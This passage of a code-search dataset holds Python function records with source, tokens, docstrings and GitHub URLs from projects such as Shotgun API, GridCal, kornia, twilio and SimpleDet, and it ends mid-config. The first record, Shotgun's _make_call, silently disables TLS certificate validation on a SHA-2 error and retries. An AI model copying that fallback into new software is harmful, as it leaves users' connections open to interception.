def _make_call(self, verb, path, body, headers): """ Make an HTTP call to the server. Handles retry and failure. """ attempt = 0 req_headers = {} req_headers["user-agent"] = "; ".join(self._user_agents) if self.config.authorization: req_headers["Authorization"] = self.config.authorization req_headers.update(headers or {}) body = body or None max_rpc_attempts = self.config.max_rpc_attempts rpc_attempt_interval = self.config.rpc_attempt_interval / 1000.0 while (attempt < max_rpc_attempts): attempt += 1 try: return self._http_request(verb, path, body, req_headers) except ssl_error_classes as e: # Test whether the exception is due to the fact that this is an older version of # Python that cannot validate certificates encrypted with SHA-2. If it is, then # fall back on disabling the certificate validation and try again - unless the # SHOTGUN_FORCE_CERTIFICATE_VALIDATION environment variable has been set by the # user. In that case we simply raise the exception. Any other exceptions simply # get raised as well. # # For more info see: # http://blog.shotgunsoftware.com/2016/01/important-ssl-certificate-renewal-and.html # # SHA-2 errors look like this: # [Errno 1] _ssl.c:480: error:0D0C50A1:asn1 encoding routines:ASN1_item_verify: # unknown message digest algorithm # # Any other exceptions simply get raised. if "unknown message digest algorithm" not in str(e) or \ "SHOTGUN_FORCE_CERTIFICATE_VALIDATION" in os.environ: raise if self.config.no_ssl_validation is False: LOG.warning("SSL Error: this Python installation is incompatible with " "certificates signed with SHA-2. Disabling certificate validation. " "For more information, see http://blog.shotgunsoftware.com/2016/01/" "important-ssl-certificate-renewal-and.html") self._turn_off_ssl_validation() # reload user agent to reflect that we have turned off ssl validation req_headers["user-agent"] = "; ".join(self._user_agents) self._close_connection() if attempt == max_rpc_attempts: raise except Exception: self._close_connection() if attempt == max_rpc_attempts: LOG.debug("Request failed. Giving up after %d attempts." % attempt) raise LOG.debug( "Request failed, attempt %d of %d. Retrying in %.2f seconds..." % (attempt, max_rpc_attempts, rpc_attempt_interval) ) time.sleep(rpc_attempt_interval)
[ "def", "_make_call", "(", "self", ",", "verb", ",", "path", ",", "body", ",", "headers", ")", ":", "attempt", "=", "0", "req_headers", "=", "{", "}", "req_headers", "[", "\"user-agent\"", "]", "=", "\"; \"", ".", "join", "(", "self", ".", "_user_agents", ")", "if", "self", ".", "config", ".", "authorization", ":", "req_headers", "[", "\"Authorization\"", "]", "=", "self", ".", "config", ".", "authorization", "req_headers", ".", "update", "(", "headers", "or", "{", "}", ")", "body", "=", "body", "or", "None", "max_rpc_attempts", "=", "self", ".", "config", ".", "max_rpc_attempts", "rpc_attempt_interval", "=", "self", ".", "config", ".", "rpc_attempt_interval", "/", "1000.0", "while", "(", "attempt", "<", "max_rpc_attempts", ")", ":", "attempt", "+=", "1", "try", ":", "return", "self", ".", "_http_request", "(", "verb", ",", "path", ",", "body", ",", "req_headers", ")", "except", "ssl_error_classes", "as", "e", ":", "# Test whether the exception is due to the fact that this is an older version of", "# Python that cannot validate certificates encrypted with SHA-2. If it is, then", "# fall back on disabling the certificate validation and try again - unless the", "# SHOTGUN_FORCE_CERTIFICATE_VALIDATION environment variable has been set by the", "# user. In that case we simply raise the exception. Any other exceptions simply", "# get raised as well.", "#", "# For more info see:", "# http://blog.shotgunsoftware.com/2016/01/important-ssl-certificate-renewal-and.html", "#", "# SHA-2 errors look like this:", "# [Errno 1] _ssl.c:480: error:0D0C50A1:asn1 encoding routines:ASN1_item_verify:", "# unknown message digest algorithm", "#", "# Any other exceptions simply get raised.", "if", "\"unknown message digest algorithm\"", "not", "in", "str", "(", "e", ")", "or", "\"SHOTGUN_FORCE_CERTIFICATE_VALIDATION\"", "in", "os", ".", "environ", ":", "raise", "if", "self", ".", "config", ".", "no_ssl_validation", "is", "False", ":", "LOG", ".", "warning", "(", "\"SSL Error: this Python installation is incompatible with \"", "\"certificates signed with SHA-2. Disabling certificate validation. \"", "\"For more information, see http://blog.shotgunsoftware.com/2016/01/\"", "\"important-ssl-certificate-renewal-and.html\"", ")", "self", ".", "_turn_off_ssl_validation", "(", ")", "# reload user agent to reflect that we have turned off ssl validation", "req_headers", "[", "\"user-agent\"", "]", "=", "\"; \"", ".", "join", "(", "self", ".", "_user_agents", ")", "self", ".", "_close_connection", "(", ")", "if", "attempt", "==", "max_rpc_attempts", ":", "raise", "except", "Exception", ":", "self", ".", "_close_connection", "(", ")", "if", "attempt", "==", "max_rpc_attempts", ":", "LOG", ".", "debug", "(", "\"Request failed. Giving up after %d attempts.\"", "%", "attempt", ")", "raise", "LOG", ".", "debug", "(", "\"Request failed, attempt %d of %d. Retrying in %.2f seconds...\"", "%", "(", "attempt", ",", "max_rpc_attempts", ",", "rpc_attempt_interval", ")", ")", "time", ".", "sleep", "(", "rpc_attempt_interval", ")" ]
https://github.com/RichardFrangenberg/Prism/blob/09283b5146d9cdf9d489dcf252f7927083534a48/Prism/Plugins/ProjectManagers/Shotgun/external_modules/shotgun_api3/shotgun.py#L3420-L3484
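The `_make_call` record above implements bounded retries with a fixed sleep between attempts. A minimal standalone sketch of the same pattern, assuming nothing from shotgun_api3 (the names `call_with_retry`, `do_request`, `max_attempts`, and `interval` are illustrative, not part of that library):

import time

def call_with_retry(do_request, max_attempts=3, interval=3.0):
    """Retry a zero-argument callable, sleeping a fixed interval between attempts."""
    for attempt in range(1, max_attempts + 1):
        try:
            return do_request()
        except Exception:
            if attempt == max_attempts:
                raise  # give up after the final attempt, as _make_call does
            time.sleep(interval)  # fixed (non-exponential) backoff, like rpc_attempt_interval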
SanPen/GridCal
d3f4566d2d72c11c7e910c9d162538ef0e60df31
src/GridCal/Engine/Replacements/poap_controller.py
python
Controller.best_point
(self, merit=None, filter=None)
Return the best point in the database satisfying some criterion. Args: merit: Function to minimize (default is r.value) filter: Predicate to use for filtering candidates Returns: Record minimizing merit() and satisfying filter(); or None if nothing satisfies the filter
Return the best point in the database satisfying some criterion.
[ "Return", "the", "best", "point", "in", "the", "database", "satisfying", "some", "criterion", "." ]
def best_point(self, merit=None, filter=None): """Return the best point in the database satisfying some criterion. Args: merit: Function to minimize (default is r.value) filter: Predicate to use for filtering candidates Returns: Record minimizing merit() and satisfying filter(); or None if nothing satisfies the filter """ if filter is None: fcomplete = [f for f in self.fevals if f.is_completed] else: fcomplete = [f for f in self.fevals if f.is_completed and filter(f)] if merit is None: def merit(r): return r.value if fcomplete: return min(fcomplete, key=merit)
[ "def", "best_point", "(", "self", ",", "merit", "=", "None", ",", "filter", "=", "None", ")", ":", "if", "filter", "is", "None", ":", "fcomplete", "=", "[", "f", "for", "f", "in", "self", ".", "fevals", "if", "f", ".", "is_completed", "]", "else", ":", "fcomplete", "=", "[", "f", "for", "f", "in", "self", ".", "fevals", "if", "f", ".", "is_completed", "and", "filter", "(", "f", ")", "]", "if", "merit", "is", "None", ":", "def", "merit", "(", "r", ")", ":", "return", "r", ".", "value", "if", "fcomplete", ":", "return", "min", "(", "fcomplete", ",", "key", "=", "merit", ")" ]
https://github.com/SanPen/GridCal/blob/d3f4566d2d72c11c7e910c9d162538ef0e60df31/src/GridCal/Engine/Replacements/poap_controller.py#L63-L83
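A hedged usage sketch for `best_point` above; the `controller` object and the `params` attribute on evaluation records are assumptions about the surrounding POAP API, not shown in this record:

# Smallest completed value (default merit is r.value):
best = controller.best_point()

# Custom merit plus a feasibility filter; returns None if nothing passes:
best_feasible = controller.best_point(
    merit=lambda r: abs(r.value),         # minimize |value| instead of value
    filter=lambda r: r.params[0] >= 0.0,  # assumed: records expose their inputs as .params
)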
IronLanguages/ironpython3
7a7bb2a872eeab0d1009fc8a6e24dca43f65b693
Src/StdLib/Lib/tkinter/tix.py
python
CheckList.getmode
(self, entrypath)
return self.tk.call(self._w, 'getmode', entrypath)
Returns the current mode of the entry given by entryPath.
Returns the current mode of the entry given by entryPath.
[ "Returns", "the", "current", "mode", "of", "the", "entry", "given", "by", "entryPath", "." ]
def getmode(self, entrypath): '''Returns the current mode of the entry given by entryPath.''' return self.tk.call(self._w, 'getmode', entrypath)
[ "def", "getmode", "(", "self", ",", "entrypath", ")", ":", "return", "self", ".", "tk", ".", "call", "(", "self", ".", "_w", ",", "'getmode'", ",", "entrypath", ")" ]
https://github.com/IronLanguages/ironpython3/blob/7a7bb2a872eeab0d1009fc8a6e24dca43f65b693/Src/StdLib/Lib/tkinter/tix.py#L1570-L1572
bpython/curtsies
56a0ad1199d346a059635982aa87ca07be17e14a
setup.py
python
version
()
Return version string.
Return version string.
[ "Return", "version", "string", "." ]
def version(): """Return version string.""" with open(os.path.join("curtsies", "__init__.py")) as input_file: for line in input_file: if line.startswith("__version__"): return ast.parse(line).body[0].value.s
[ "def", "version", "(", ")", ":", "with", "open", "(", "os", ".", "path", ".", "join", "(", "\"curtsies\"", ",", "\"__init__.py\"", ")", ")", "as", "input_file", ":", "for", "line", "in", "input_file", ":", "if", "line", ".", "startswith", "(", "\"__version__\"", ")", ":", "return", "ast", ".", "parse", "(", "line", ")", ".", "body", "[", "0", "]", ".", "value", ".", "s" ]
https://github.com/bpython/curtsies/blob/56a0ad1199d346a059635982aa87ca07be17e14a/setup.py#L6-L11
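The `version()` helper above leans on `ast.parse` producing a module whose first statement is the assignment; a quick self-contained check of that extraction step (the version string here is made up):

import ast

line = '__version__ = "0.4.2"\n'
node = ast.parse(line).body[0]  # an ast.Assign node
print(node.value.s)             # 0.4.2 -- .s is the legacy accessor used above; node.value.value is the modern spelling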
dclambert/Python-ELM
00a231e5b917d893fedb9f1747446ba0ac032b8e
random_layer.py
python
BaseRandomLayer.transform
(self, X, y=None)
return self._compute_hidden_activations(X)
Generate the random hidden layer's activations given X as input. Parameters ---------- X : {array-like, sparse matrix}, shape [n_samples, n_features] Data to transform y : is not used: placeholder to allow for usage in a Pipeline. Returns ------- X_new : numpy array of shape [n_samples, n_components]
Generate the random hidden layer's activations given X as input.
[ "Generate", "the", "random", "hidden", "layer", "s", "activations", "given", "X", "as", "input", "." ]
def transform(self, X, y=None): """Generate the random hidden layer's activations given X as input. Parameters ---------- X : {array-like, sparse matrix}, shape [n_samples, n_features] Data to transform y : is not used: placeholder to allow for usage in a Pipeline. Returns ------- X_new : numpy array of shape [n_samples, n_components] """ X = atleast2d_or_csr(X) if (self.components_ is None): raise ValueError('No components initialized') return self._compute_hidden_activations(X)
[ "def", "transform", "(", "self", ",", "X", ",", "y", "=", "None", ")", ":", "X", "=", "atleast2d_or_csr", "(", "X", ")", "if", "(", "self", ".", "components_", "is", "None", ")", ":", "raise", "ValueError", "(", "'No components initialized'", ")", "return", "self", ".", "_compute_hidden_activations", "(", "X", ")" ]
https://github.com/dclambert/Python-ELM/blob/00a231e5b917d893fedb9f1747446ba0ac032b8e/random_layer.py#L119-L138
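Because `transform` raises unless `components_` has been initialized, the expected call order for the record above is fit-then-transform, as in scikit-learn. A sketch assuming `RandomLayer` is a concrete subclass shipped in the same random_layer.py module and that it accepts an `n_hidden` parameter (both are assumptions):

import numpy as np
from random_layer import RandomLayer  # assumed concrete subclass

X = np.random.rand(100, 10)
layer = RandomLayer(n_hidden=20)  # n_hidden assumed from the module's conventions
H = layer.fit(X).transform(X)     # fit() populates components_; transform() projects
print(H.shape)                    # (100, 20)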
SanPen/GridCal
d3f4566d2d72c11c7e910c9d162538ef0e60df31
src/GridCal/Engine/Replacements/poap_controller.py
python
BaseWorkerThread.add_worker
(self)
Add worker back to the work queue.
Add worker back to the work queue.
[ "Add", "worker", "back", "to", "the", "work", "queue", "." ]
def add_worker(self): "Add worker back to the work queue." logger.debug("Worker thread is ready") self.controller.add_worker(self)
[ "def", "add_worker", "(", "self", ")", ":", "logger", ".", "debug", "(", "\"Worker thread is ready\"", ")", "self", ".", "controller", ".", "add_worker", "(", "self", ")" ]
https://github.com/SanPen/GridCal/blob/d3f4566d2d72c11c7e910c9d162538ef0e60df31/src/GridCal/Engine/Replacements/poap_controller.py#L410-L413
awslabs/datawig
f641342d05e95485ed88503d3efd9c3cca3eb7ab
datawig/utils.py
python
sample_cartesian
(sets: List, idx: int, n: int = None)
return out
Draw samples from the cartesian product of all iterables in sets. Each row in the cartesian product has a unique index. This function returns the row with index idx without materialising any of the other rows. For a cartesian product of lists with length l1, l2, ... lm, taking the cartesian product can be thought of as traversing through all lists picking one element of each and repeating this until all possible combinations are exhausted. The number of combinations is N=l1*l2*...*lm. This can make materialization of the list impractical. By taking the first element from every list that leads to a new combination, we can define a unique enumeration of all combinations. :param sets: List of iterables :param idx: Index of desired row in the cartesian product :param n: Number of rows in the cartesian product
Draw samples from the cartesian product of all iterables in sets. Each row in the cartesian product has a unique index. This function returns the row with index idx without materialising any of the other rows.
[ "Draw", "samples", "from", "the", "cartesian", "product", "of", "all", "iterables", "in", "sets", ".", "Each", "row", "in", "the", "cartesian", "product", "has", "a", "unique", "index", ".", "This", "function", "returns", "the", "row", "with", "index", "idx", "without", "materialising", "any", "of", "the", "other", "rows", "." ]
def sample_cartesian(sets: List, idx: int, n: int = None) -> List: """ Draw samples from the cartesian product of all iterables in sets. Each row in the cartesian product has a unique index. This function returns the row with index idx without materialising any of the other rows. For a cartesian product of lists with length l1, l2, ... lm, taking the cartesian product can be thought of as traversing through all lists picking one element of each and repeating this until all possible combinations are exhausted. The number of combinations is N=l1*l2*...*lm. This can make materialization of the list impractical. By taking the first element from every list that leads to a new combination, we can define a unique enumeration of all combinations. :param sets: List of iterables :param idx: Index of desired row in the cartesian product :param n: Number of rows in the cartesian product """ if n is None: n = np.prod([len(y) for y in sets]) out = [] # prepare list to append elements to. width = n # width of the index set in which the desired row falls. for item_set in sets: width = width/len(item_set) # map index set onto first item_set bucket = int(np.floor(idx/width)) # determine index of the first item_set out.append(item_set[bucket]) idx = idx - bucket*width # restrict index to next item_set in the hierarchy (could use modulo operator here.) assert width == 1 # at the end of this procedure, the leaf index set should have width 1. return out
[ "def", "sample_cartesian", "(", "sets", ":", "List", ",", "idx", ":", "int", ",", "n", ":", "int", "=", "None", ")", "->", "List", ":", "if", "n", "is", "None", ":", "n", "=", "np", ".", "prod", "(", "[", "len", "(", "y", ")", "for", "y", "in", "sets", "]", ")", "out", "=", "[", "]", "# prepare list to append elements to.", "width", "=", "n", "# width of the index set in which the desired row falls.", "for", "item_set", "in", "sets", ":", "width", "=", "width", "/", "len", "(", "item_set", ")", "# map index set onto first item_set", "bucket", "=", "int", "(", "np", ".", "floor", "(", "idx", "/", "width", ")", ")", "# determine index of the first item_set", "out", ".", "append", "(", "item_set", "[", "bucket", "]", ")", "idx", "=", "idx", "-", "bucket", "*", "width", "# restrict index to next item_set in the hierarchy (could use modulo operator here.)", "assert", "width", "==", "1", "# at the end of this procedure, the leaf index set should have width 1.", "return", "out" ]
https://github.com/awslabs/datawig/blob/f641342d05e95485ed88503d3efd9c3cca3eb7ab/datawig/utils.py#L374-L407
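A worked trace of `sample_cartesian` above with sets = [['a', 'b'], [0, 1, 2]], so n = 2*3 = 6. For idx = 4: width goes 6 -> 3, bucket = floor(4/3) = 1 picks 'b' and leaves idx = 4 - 3 = 1; then width goes 3 -> 1 and bucket = 1 picks 1. The enumeration matches itertools.product order, which gives a cheap cross-check (assuming the function above is in scope):

from itertools import product

sets = [['a', 'b'], [0, 1, 2]]
print(sample_cartesian(sets, idx=4, n=6))  # ['b', 1], without materializing the product
print(list(product(*sets))[4])             # ('b', 1), the materialized cross-check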
home-assistant/supervisor
69c2517d5211b483fdfe968b0a2b36b672ee7ab2
supervisor/services/interface.py
python
ServiceInterface._data
(self)
Return data of this service.
Return data of this service.
[ "Return", "data", "of", "this", "service", "." ]
def _data(self) -> dict[str, Any]: """Return data of this service."""
[ "def", "_data", "(", "self", ")", "->", "dict", "[", "str", ",", "Any", "]", ":" ]
https://github.com/home-assistant/supervisor/blob/69c2517d5211b483fdfe968b0a2b36b672ee7ab2/supervisor/services/interface.py#L26-L27
goace/personal-file-sharing-center
4a5b903b003f2db1306e77c5e51b6660fc5dbc6a
web/template.py
python
CompiledTemplate.__init__
(self, f, filename)
[]
def __init__(self, f, filename): Template.__init__(self, '', filename) self.t = f
[ "def", "__init__", "(", "self", ",", "f", ",", "filename", ")", ":", "Template", ".", "__init__", "(", "self", ",", "''", ",", "filename", ")", "self", ".", "t", "=", "f" ]
https://github.com/goace/personal-file-sharing-center/blob/4a5b903b003f2db1306e77c5e51b6660fc5dbc6a/web/template.py#L936-L938
jbjorne/TEES
caf19a4a1352ac59f5dc13a8684cc42ce4342d9d
ExampleWriters/EdgeExampleWriter.py
python
EdgeExampleWriter.__init__
(self)
[]
def __init__(self): self.xType = "edge" self.removeEdges = True SentenceExampleWriter.__init__(self)
[ "def", "__init__", "(", "self", ")", ":", "self", ".", "xType", "=", "\"edge\"", "self", ".", "removeEdges", "=", "True", "SentenceExampleWriter", ".", "__init__", "(", "self", ")" ]
https://github.com/jbjorne/TEES/blob/caf19a4a1352ac59f5dc13a8684cc42ce4342d9d/ExampleWriters/EdgeExampleWriter.py#L9-L12
kornia/kornia
b12d6611b1c41d47b2c93675f0ea344b5314a688
kornia/geometry/transform/flips.py
python
rot180
(input: torch.Tensor)
return torch.flip(input, [-2, -1])
r"""Rotate a tensor image or a batch of tensor images 180 degrees. .. image:: _static/img/rot180.png Input must be a tensor of shape (C, H, W) or a batch of tensors :math:`(*, C, H, W)`. Args: input: input tensor. Returns: The rotated image tensor.
r"""Rotate a tensor image or a batch of tensor images 180 degrees.
[ "r", "Rotate", "a", "tensor", "image", "or", "a", "batch", "of", "tensor", "images", "180", "degrees", "." ]
def rot180(input: torch.Tensor) -> torch.Tensor: r"""Rotate a tensor image or a batch of tensor images 180 degrees. .. image:: _static/img/rot180.png Input must be a tensor of shape (C, H, W) or a batch of tensors :math:`(*, C, H, W)`. Args: input: input tensor. Returns: The rotated image tensor. """ return torch.flip(input, [-2, -1])
[ "def", "rot180", "(", "input", ":", "torch", ".", "Tensor", ")", "->", "torch", ".", "Tensor", ":", "return", "torch", ".", "flip", "(", "input", ",", "[", "-", "2", ",", "-", "1", "]", ")" ]
https://github.com/kornia/kornia/blob/b12d6611b1c41d47b2c93675f0ea344b5314a688/kornia/geometry/transform/flips.py#L104-L119
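A quick numeric check of `rot180` above (assuming the function is in scope): flipping the last two dims reverses rows and columns together.

import torch

img = torch.arange(6.).reshape(1, 2, 3)  # one channel, 2x3 "image": [[0,1,2],[3,4,5]]
print(rot180(img))
# tensor([[[5., 4., 3.],
#          [2., 1., 0.]]])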
Podshot/MCEdit-Unified
90abfb170c65b877ac67193e717fa3a3ded635dd
stock-filters/Forester.py
python
assign_value
(x, y, z, values, save_file)
return result
Assign an index value to a location in mcmap. If the index is outside the bounds of the map, return None. If the assignment succeeds, return True.
Assign an index value to a location in mcmap.
[ "Assign", "an", "index", "value", "to", "a", "location", "in", "mcmap", "." ]
def assign_value(x, y, z, values, save_file): '''Assign an index value to a location in mcmap. If the index is outside the bounds of the map, return None. If the assignment succeeds, return True. ''' if y > 255: return None result = save_file.set_block(x, y, z, values) if LIGHTINGFIX: relight_master.add(x, z) return result
[ "def", "assign_value", "(", "x", ",", "y", ",", "z", ",", "values", ",", "save_file", ")", ":", "if", "y", ">", "255", ":", "return", "None", "result", "=", "save_file", ".", "set_block", "(", "x", ",", "y", ",", "z", ",", "values", ")", "if", "LIGHTINGFIX", ":", "relight_master", ".", "add", "(", "x", ",", "z", ")", "return", "result" ]
https://github.com/Podshot/MCEdit-Unified/blob/90abfb170c65b877ac67193e717fa3a3ded635dd/stock-filters/Forester.py#L461-L472
pyg-team/pytorch_geometric
b920e9a3a64e22c8356be55301c88444ff051cae
examples/infomax_inductive.py
python
Encoder.__init__
(self, in_channels, hidden_channels)
[]
def __init__(self, in_channels, hidden_channels): super().__init__() self.convs = torch.nn.ModuleList([ SAGEConv(in_channels, hidden_channels), SAGEConv(hidden_channels, hidden_channels), SAGEConv(hidden_channels, hidden_channels) ]) self.activations = torch.nn.ModuleList() self.activations.extend([ nn.PReLU(hidden_channels), nn.PReLU(hidden_channels), nn.PReLU(hidden_channels) ])
[ "def", "__init__", "(", "self", ",", "in_channels", ",", "hidden_channels", ")", ":", "super", "(", ")", ".", "__init__", "(", ")", "self", ".", "convs", "=", "torch", ".", "nn", ".", "ModuleList", "(", "[", "SAGEConv", "(", "in_channels", ",", "hidden_channels", ")", ",", "SAGEConv", "(", "hidden_channels", ",", "hidden_channels", ")", ",", "SAGEConv", "(", "hidden_channels", ",", "hidden_channels", ")", "]", ")", "self", ".", "activations", "=", "torch", ".", "nn", ".", "ModuleList", "(", ")", "self", ".", "activations", ".", "extend", "(", "[", "nn", ".", "PReLU", "(", "hidden_channels", ")", ",", "nn", ".", "PReLU", "(", "hidden_channels", ")", ",", "nn", ".", "PReLU", "(", "hidden_channels", ")", "]", ")" ]
https://github.com/pyg-team/pytorch_geometric/blob/b920e9a3a64e22c8356be55301c88444ff051cae/examples/infomax_inductive.py#L26-L39
zhl2008/awd-platform
0416b31abea29743387b10b3914581fbe8e7da5e
web_flaskbb/Python-2.7.9/Lib/plat-mac/FrameWork.py
python
MenuItem.check
(self, onoff)
[]
def check(self, onoff): self.menu.menu.CheckMenuItem(self.item, onoff)
[ "def", "check", "(", "self", ",", "onoff", ")", ":", "self", ".", "menu", ".", "menu", ".", "CheckMenuItem", "(", "self", ".", "item", ",", "onoff", ")" ]
https://github.com/zhl2008/awd-platform/blob/0416b31abea29743387b10b3914581fbe8e7da5e/web_flaskbb/Python-2.7.9/Lib/plat-mac/FrameWork.py#L674-L675
robotframework/robotframework
e4f66e7bbe02b1741224ad4ab3fbfe9e1cb51ecf
src/robot/utils/misc.py
python
seq2str2
(sequence)
return '[ %s ]' % ' | '.join(safe_str(item) for item in sequence)
Returns sequence in format `[ item 1 | item 2 | ... ]`.
Returns sequence in format `[ item 1 | item 2 | ... ]`.
[ "Returns", "sequence", "in", "format", "[", "item", "1", "|", "item", "2", "|", "...", "]", "." ]
def seq2str2(sequence): """Returns sequence in format `[ item 1 | item 2 | ... ]`.""" if not sequence: return '[ ]' return '[ %s ]' % ' | '.join(safe_str(item) for item in sequence)
[ "def", "seq2str2", "(", "sequence", ")", ":", "if", "not", "sequence", ":", "return", "'[ ]'", "return", "'[ %s ]'", "%", "' | '", ".", "join", "(", "safe_str", "(", "item", ")", "for", "item", "in", "sequence", ")" ]
https://github.com/robotframework/robotframework/blob/e4f66e7bbe02b1741224ad4ab3fbfe9e1cb51ecf/src/robot/utils/misc.py#L117-L121
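Both branches of `seq2str2` above, shown on sample input (assuming the function is in scope):

print(seq2str2(['first', 2, None]))  # [ first | 2 | None ]
print(seq2str2([]))                  # [ ]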
twilio/twilio-python
6e1e811ea57a1edfadd5161ace87397c563f6915
twilio/rest/serverless/v1/service/asset/asset_version.py
python
AssetVersionInstance.__init__
(self, version, payload, service_sid, asset_sid, sid=None)
Initialize the AssetVersionInstance :returns: twilio.rest.serverless.v1.service.asset.asset_version.AssetVersionInstance :rtype: twilio.rest.serverless.v1.service.asset.asset_version.AssetVersionInstance
Initialize the AssetVersionInstance
[ "Initialize", "the", "AssetVersionInstance" ]
def __init__(self, version, payload, service_sid, asset_sid, sid=None): """ Initialize the AssetVersionInstance :returns: twilio.rest.serverless.v1.service.asset.asset_version.AssetVersionInstance :rtype: twilio.rest.serverless.v1.service.asset.asset_version.AssetVersionInstance """ super(AssetVersionInstance, self).__init__(version) # Marshaled Properties self._properties = { 'sid': payload.get('sid'), 'account_sid': payload.get('account_sid'), 'service_sid': payload.get('service_sid'), 'asset_sid': payload.get('asset_sid'), 'path': payload.get('path'), 'visibility': payload.get('visibility'), 'date_created': deserialize.iso8601_datetime(payload.get('date_created')), 'url': payload.get('url'), } # Context self._context = None self._solution = { 'service_sid': service_sid, 'asset_sid': asset_sid, 'sid': sid or self._properties['sid'], }
[ "def", "__init__", "(", "self", ",", "version", ",", "payload", ",", "service_sid", ",", "asset_sid", ",", "sid", "=", "None", ")", ":", "super", "(", "AssetVersionInstance", ",", "self", ")", ".", "__init__", "(", "version", ")", "# Marshaled Properties", "self", ".", "_properties", "=", "{", "'sid'", ":", "payload", ".", "get", "(", "'sid'", ")", ",", "'account_sid'", ":", "payload", ".", "get", "(", "'account_sid'", ")", ",", "'service_sid'", ":", "payload", ".", "get", "(", "'service_sid'", ")", ",", "'asset_sid'", ":", "payload", ".", "get", "(", "'asset_sid'", ")", ",", "'path'", ":", "payload", ".", "get", "(", "'path'", ")", ",", "'visibility'", ":", "payload", ".", "get", "(", "'visibility'", ")", ",", "'date_created'", ":", "deserialize", ".", "iso8601_datetime", "(", "payload", ".", "get", "(", "'date_created'", ")", ")", ",", "'url'", ":", "payload", ".", "get", "(", "'url'", ")", ",", "}", "# Context", "self", ".", "_context", "=", "None", "self", ".", "_solution", "=", "{", "'service_sid'", ":", "service_sid", ",", "'asset_sid'", ":", "asset_sid", ",", "'sid'", ":", "sid", "or", "self", ".", "_properties", "[", "'sid'", "]", ",", "}" ]
https://github.com/twilio/twilio-python/blob/6e1e811ea57a1edfadd5161ace87397c563f6915/twilio/rest/serverless/v1/service/asset/asset_version.py#L263-L290
chengzhengxin/groupsoftmax-simpledet
3f63a00998c57fee25241cf43a2e8600893ea462
config/resnet_v1b/mask_r50v1b_fpn_2x.py
python
get_config
(is_train)
return General, KvstoreParam, RpnParam, RoiParam, BboxParam, DatasetParam, \ ModelParam, OptimizeParam, TestParam, \ transform, data_name, label_name, metric_list
[]
def get_config(is_train): class General: log_frequency = 10 name = __name__.rsplit("/")[-1].rsplit(".")[-1] batch_image = 2 if is_train else 1 fp16 = False loader_worker = 8 class KvstoreParam: kvstore = "nccl" batch_image = General.batch_image gpus = [0, 1, 2, 3, 4, 5, 6, 7] fp16 = General.fp16 class NormalizeParam: normalizer = normalizer_factory(type="fixbn") class BackboneParam: fp16 = General.fp16 normalizer = NormalizeParam.normalizer depth = 50 class NeckParam: fp16 = General.fp16 normalizer = NormalizeParam.normalizer class RpnParam: fp16 = General.fp16 normalizer = NormalizeParam.normalizer batch_image = General.batch_image nnvm_proposal = True nnvm_rpn_target = False class anchor_generate: scale = (8,) ratio = (0.5, 1.0, 2.0) stride = (4, 8, 16, 32, 64) image_anchor = 256 max_side = 1400 class anchor_assign: allowed_border = 0 pos_thr = 0.7 neg_thr = 0.3 min_pos_thr = 0.0 image_anchor = 256 pos_fraction = 0.5 class head: conv_channel = 256 mean = (0, 0, 0, 0) std = (1, 1, 1, 1) class proposal: pre_nms_top_n = 2000 if is_train else 1000 post_nms_top_n = 2000 if is_train else 1000 nms_thr = 0.7 min_bbox_side = 0 class subsample_proposal: proposal_wo_gt = False image_roi = 512 fg_fraction = 0.25 fg_thr = 0.5 bg_thr_hi = 0.5 bg_thr_lo = 0.0 class bbox_target: num_reg_class = 81 class_agnostic = False weight = (1.0, 1.0, 1.0, 1.0) mean = (0.0, 0.0, 0.0, 0.0) std = (0.1, 0.1, 0.2, 0.2) class BboxParam: fp16 = General.fp16 normalizer = NormalizeParam.normalizer num_class = 1 + 80 image_roi = 512 batch_image = General.batch_image class regress_target: class_agnostic = False mean = (0.0, 0.0, 0.0, 0.0) std = (0.1, 0.1, 0.2, 0.2) class MaskParam: fp16 = General.fp16 normalizer = NormalizeParam.normalizer resolution = 28 dim_reduced = 256 num_fg_roi = int(RpnParam.subsample_proposal.image_roi * RpnParam.subsample_proposal.fg_fraction) class RoiParam: fp16 = General.fp16 normalizer = NormalizeParam.normalizer out_size = 7 stride = (4, 8, 16, 32) roi_canonical_scale = 224 roi_canonical_level = 4 class MaskRoiParam: fp16 = General.fp16 normalizer = NormalizeParam.normalizer out_size = 14 stride = (4, 8, 16, 32) roi_canonical_scale = 224 roi_canonical_level = 4 class DatasetParam: if is_train: image_set = ("coco_train2014", "coco_valminusminival2014") else: image_set = ("coco_minival2014", ) class OptimizeParam: class optimizer: type = "sgd" lr = 0.01 / 8 * len(KvstoreParam.gpus) * KvstoreParam.batch_image momentum = 0.9 wd = 0.0001 clip_gradient = None class schedule: mult = 2 begin_epoch = 0 end_epoch = 6 * mult lr_iter = [60000 * mult * 16 // (len(KvstoreParam.gpus) * KvstoreParam.batch_image), 80000 * mult * 16 // (len(KvstoreParam.gpus) * KvstoreParam.batch_image)] class warmup: type = "gradual" lr = 0.01 / 8 * len(KvstoreParam.gpus) * KvstoreParam.batch_image / 3.0 iter = 500 class TestParam: min_det_score = 0.05 max_det_per_image = 100 process_roidb = lambda x: x process_output = lambda x, y: process_output(x, y) class model: prefix = "experiments/{}/checkpoint".format(General.name) epoch = OptimizeParam.schedule.end_epoch class nms: type = "nms" thr = 0.5 class coco: annotation = "data/coco/annotations/instances_minival2014.json" backbone = Backbone(BackboneParam) neck = Neck(NeckParam) rpn_head = RpnHead(RpnParam, MaskParam) roi_extractor = RoiExtractor(RoiParam) mask_roi_extractor = RoiExtractor(MaskRoiParam) bbox_head = BboxHead(BboxParam) mask_head = MaskHead(BboxParam, MaskParam, MaskRoiParam) bbox_post_processer = BboxPostProcessor(TestParam) detector = Detector() if is_train: 
train_sym = detector.get_train_symbol(backbone, neck, rpn_head, roi_extractor, mask_roi_extractor, bbox_head, mask_head) test_sym = None else: train_sym = None test_sym = detector.get_test_symbol(backbone, neck, rpn_head, roi_extractor, mask_roi_extractor, bbox_head, mask_head, bbox_post_processer) class ModelParam: train_symbol = train_sym test_symbol = test_sym from_scratch = False random = True memonger = False memonger_until = "stage3_unit21_plus" class pretrain: prefix = "pretrain_model/resnet%s_v1b" % BackboneParam.depth epoch = 0 fixed_param = ["conv0", "stage1", "gamma", "beta"] excluded_param = ["mask_fcn"] def process_weight(sym, arg, aux): for stride in RpnParam.anchor_generate.stride: add_anchor_to_arg( sym, arg, aux, RpnParam.anchor_generate.max_side, stride, RpnParam.anchor_generate.scale, RpnParam.anchor_generate.ratio) # data processing class NormParam: mean = tuple(i * 255 for i in (0.485, 0.456, 0.406)) # RGB order std = tuple(i * 255 for i in (0.229, 0.224, 0.225)) # data processing class ResizeParam: short = 800 long = 1333 class PadParam: short = 800 